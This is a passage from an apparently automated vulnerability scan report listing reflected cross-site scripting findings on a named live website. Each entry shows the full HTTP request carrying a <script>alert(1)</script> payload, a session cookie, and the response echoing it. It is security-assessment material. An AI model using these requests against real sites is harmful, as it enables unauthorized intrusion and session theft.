The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5226b<script>alert(1)</script>68c98b834c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes5226b<script>alert(1)</script>68c98b834c9/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes5226b<script>alert(1)</script>68c98b834c9/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2493. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0e3d<script>alert(1)</script>2508f589ed5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosb0e3d<script>alert(1)</script>2508f589ed5/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosb0e3d<script>alert(1)</script>2508f589ed5/images/ was not found on this server.</p>
...[SNIP]...

2.2494. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12f9b<script>alert(1)</script>c32db453f50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images12f9b<script>alert(1)</script>c32db453f50/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images12f9b<script>alert(1)</script>c32db453f50/ was not found on this server.</p>
...[SNIP]...

2.2495. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7a341<script>alert(1)</script>5c6ce34e44b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/?7a341<script>alert(1)</script>5c6ce34e44b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/?7a341<script>alert(1)</script>5c6ce34e44b=1 was not found on this server.</p>
...[SNIP]...

2.2496. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50ac1<script>alert(1)</script>3bcedcecce5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50ac1<script>alert(1)</script>3bcedcecce5/37/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50ac1<script>alert(1)</script>3bcedcecce5/37/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2497. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d9ec<script>alert(1)</script>ebb141b6d1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/376d9ec<script>alert(1)</script>ebb141b6d1c/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/376d9ec<script>alert(1)</script>ebb141b6d1c/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2498. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a50fb<script>alert(1)</script>c5f299e0c66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themesa50fb<script>alert(1)</script>c5f299e0c66/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themesa50fb<script>alert(1)</script>c5f299e0c66/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2499. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 295c9<script>alert(1)</script>2ded033f074 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos295c9<script>alert(1)</script>2ded033f074/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos295c9<script>alert(1)</script>2ded033f074/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2500. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5c839<script>alert(1)</script>90c5f42c34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images5c839<script>alert(1)</script>90c5f42c34/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images5c839<script>alert(1)</script>90c5f42c34/rating/ was not found on this server.</p>
...[SNIP]...

2.2501. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4aff1<script>alert(1)</script>f73f57992f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating4aff1<script>alert(1)</script>f73f57992f6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating4aff1<script>alert(1)</script>f73f57992f6/ was not found on this server.</p>
...[SNIP]...

2.2502. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa863<script>alert(1)</script>86b051a5946 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/?aa863<script>alert(1)</script>86b051a5946=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/?aa863<script>alert(1)</script>86b051a5946=1 was not found on this server.</p>
...[SNIP]...

2.2503. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eda35<script>alert(1)</script>3db69b1120b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaileda35<script>alert(1)</script>3db69b1120b/37/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaileda35<script>alert(1)</script>3db69b1120b/37/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2504. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d00f<script>alert(1)</script>ad7984c2770 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/374d00f<script>alert(1)</script>ad7984c2770/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/374d00f<script>alert(1)</script>ad7984c2770/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2505. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a451c<script>alert(1)</script>0e5dd70e9a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themesa451c<script>alert(1)</script>0e5dd70e9a0/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themesa451c<script>alert(1)</script>0e5dd70e9a0/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2506. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b47d0<script>alert(1)</script>ee19d721d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosb47d0<script>alert(1)</script>ee19d721d9/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosb47d0<script>alert(1)</script>ee19d721d9/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2507. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 496a9<script>alert(1)</script>263f8ea2268 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images496a9<script>alert(1)</script>263f8ea2268/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images496a9<script>alert(1)</script>263f8ea2268/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2508. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d606b<script>alert(1)</script>63bdf3da716 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/ratingd606b<script>alert(1)</script>63bdf3da716/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/ratingd606b<script>alert(1)</script>63bdf3da716/4half.gif was not found on this server.</p>
...[SNIP]...

2.2509. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c275a<script>alert(1)</script>1d84eacf182 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/4half.gifc275a<script>alert(1)</script>1d84eacf182 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/4half.gifc275a<script>alert(1)</script>1d84eacf182 was not found on this server.</p>
...[SNIP]...

2.2510. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a49ac<script>alert(1)</script>04a8d81e02b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/4half.gif?a49ac<script>alert(1)</script>04a8d81e02b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/4half.gif?a49ac<script>alert(1)</script>04a8d81e02b=1 was not found on this server.</p>
...[SNIP]...

2.2511. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb125<script>alert(1)</script>5aa1aa6c11f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbb125<script>alert(1)</script>5aa1aa6c11f/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
